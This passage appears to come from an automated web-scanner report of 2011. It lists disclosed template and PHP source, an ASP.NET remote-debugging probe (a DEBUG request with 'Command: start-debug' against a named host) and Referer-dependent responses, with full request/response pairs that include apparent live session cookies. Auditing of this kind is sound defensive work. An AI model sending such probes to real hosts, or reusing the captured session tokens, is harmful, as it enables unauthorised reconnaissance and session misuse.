<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/pricebox_bg.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'price\': price, \'totalPrice\': totalPrice, \'broker\': broker, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonClass\': (goButtonColor || bid), \'goButtonText\': goButtonText})%>\n\
<div class="upperLeft">
...[SNIP]...
<div class="tix-list-prop<%= FS.config.view.highlightBasePrice ? \'-tall\' : \'\' %>"></div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/ticket_info.ejs\').render({\'bvTag\': bvTag, \'brokerId\': brokerId, \'section\': section, \'row\': row, \'dateTime\': dateTime, \'splitsText\': splitsText, \'notes\': notes, \'eTicketsUI\': eTicketsUI, \'hasETicket\': hasETicket})%>\n\
</div>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/panel_links.ejs\').render({\'ticketId\': ticketId, \'sharingEnabled\': sharingEnabled, \'shortListEnabled\': shortListEnabled, \'saved\': false})%>\n\
</div>
...[SNIP]...
<div class="offerLower">\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/details_panel.ejs\').render({\'ticketId\': ticketId, \'listPosition\': listPosition, \'deals\': deals, \'notes\': notes, \'srcCtx\': srcCtx, \'mapType\': mapType, \'totalDeals\': totalDeals, \'goButtonText\': goButtonText, \'detailPanelNote\': detailPanelNote, \'eTicketsUI\': eTicketsUI})%>\n\
<% if (sharingEnabled) { %>\n\
<%= lookupEjsTemplate(\'seats_page/ticket_sets/new_base/list/sharing_panel.ejs\').render({\'price\': price, \'section\': section, \'row\': row, \'shareId\': shareId, \'twitterUrl\': sharingLinks[\'Twitter\'][\'url\'], \'emailUrl\': sharingLinks[\'Email\'][\'url\']} )%>\n\
<% } %>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %>&nbsp;<%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section!&nbsp;\n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to("&nbsp;", \'/reviews_photos_intro\', {target: \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="seat-view-link-rt">\n\
<%= link_to(\'Zoom into map\',"javascript:void(0)", {\'class\': \'zoom-to-map\'}) %>\n\
</div>
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>\n\
<% if (ugcEnabled) { %>\n\
<div class="seat-view-vfs">
...[SNIP]...
<div class="seat-view-image">\n\
<%= photos %>\n\
<div class="seat-view-link-lt">
...[SNIP]...
<div class="sec-rev-avail sec-rev-state<%= hasRevTag %>">\n\
<% if (readReviewsEnabled) { %>\n\
<%= sampleRevTxt %>&nbsp;<%=link_to("Read reviews" + revCnt, "#", {\'class\': \'sec-rr-link\'}) %>\n\
<% } %>
...[SNIP]...
<div class="sec-rev-none sec-rev-state<%= noRevTag %>">\n\
<% if (writeEnabled) { %>\n\
Be the first to review this section!&nbsp;\n\
<a href="/reviews/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
...[SNIP]...
</a>\n\
<%= link_to("&nbsp;", \'/reviews_photos_intro\', {\'target\': \'_blank\', \'class\': \'info-icon-link\'}) %>\n\
<% } %>
...[SNIP]...
</div>\n\
<% if (uploadEnabled) { %>\n\
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<% catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" class="seat_view_upload-phot-link" target="_blank">
...[SNIP]...
<div class="map-det-top">\n\
<%= label %>\n\
<%= link_to(img_tag(cdn_asset_path(\'/images/cancel.png\')),"javascript:void(0)", {\'class\': "close"}) %>\n\
</div>
...[SNIP]...

16.7. http://www.seapine.com/ttpro.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.seapine.com
Path:   /ttpro.html

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /ttpro.html?utm_source=GoogleAdwords&utm_campaign=BugTrackingAdgroup&utm_medium=Search&utm_content= HTTP/1.1
Host: www.seapine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SourceKey=201107191020391579

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:48 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Tue, 19 Jul 2011 16:20:48 GMT
Vary: Accept-Encoding
Content-Length: 28599
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <Title>Issue Tracking Software| TestTrack Pro | Bug Tracking
...[SNIP]...
</div><?php include("{$_SERVER['DOCUMENT_ROOT']}/ssi/TopMenu.html");?></td>
...[SNIP]...
</div>
<?php
   include("{$_SERVER['DOCUMENT_ROOT']}/ssi/quotes.inc.php");
?>
</td>
...[SNIP]...

17. ASP.NET debugging enabled  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clickmanage.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.clickmanage.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 19 Jul 2011 14:20:24 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18. Referer-dependent response  previous  next
There are 18 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



18.1. http://bing.fansnap.com/checkout/index/415814268  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Request 1

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 19
ETag: "912210bf9f97f8eae912bcb4828410b5"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BH%2FkqNBjoLb2Zmc2V0af6QnQ%3D%3D--976c30f9ab045a1cfd33499b88aa515a33432d71; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11824
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-776896836%3A1342566830275585%3Apgscheckout%7C%252Fcheckout%252Findex%252F415814268%26_ctx%3D%26_ts%3D1311100520%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html' width='1' />
</body>
</html>

Request 2

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 52
ETag: "ed8c1167ba6b89c7b7ac5eb20ca52c6c"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4D2EZ6NBjoLb2Zmc2V0af6QnQ%3D%3D--1d1d68320df3776d4e25bf547f56f252b99b0656; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11611
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-776896836%3A1342566830275585%3Apgscheckout%7C%252Fcheckout%252Findex%252F415814268%26_ctx%3D%26_ts%3D1311100525%26_st%3D%26_ma%3D13%26_ref%3D' width='1' />
</body>
</html>

18.2. http://bing.fansnap.com/checkout/index/418563179  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Request 1

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 22
ETag: "a77815d5d483b7d39d35206e9af3772a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CWdhqOBjoLb2Zmc2V0af6QnQ%3D%3D--8f0f6d1603aea2d08c675430159ed90f71b0f19d; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11810
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-776896836%3A1342566830275585%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100533%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html' width='1' />
</body>
</html>

Request 2

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
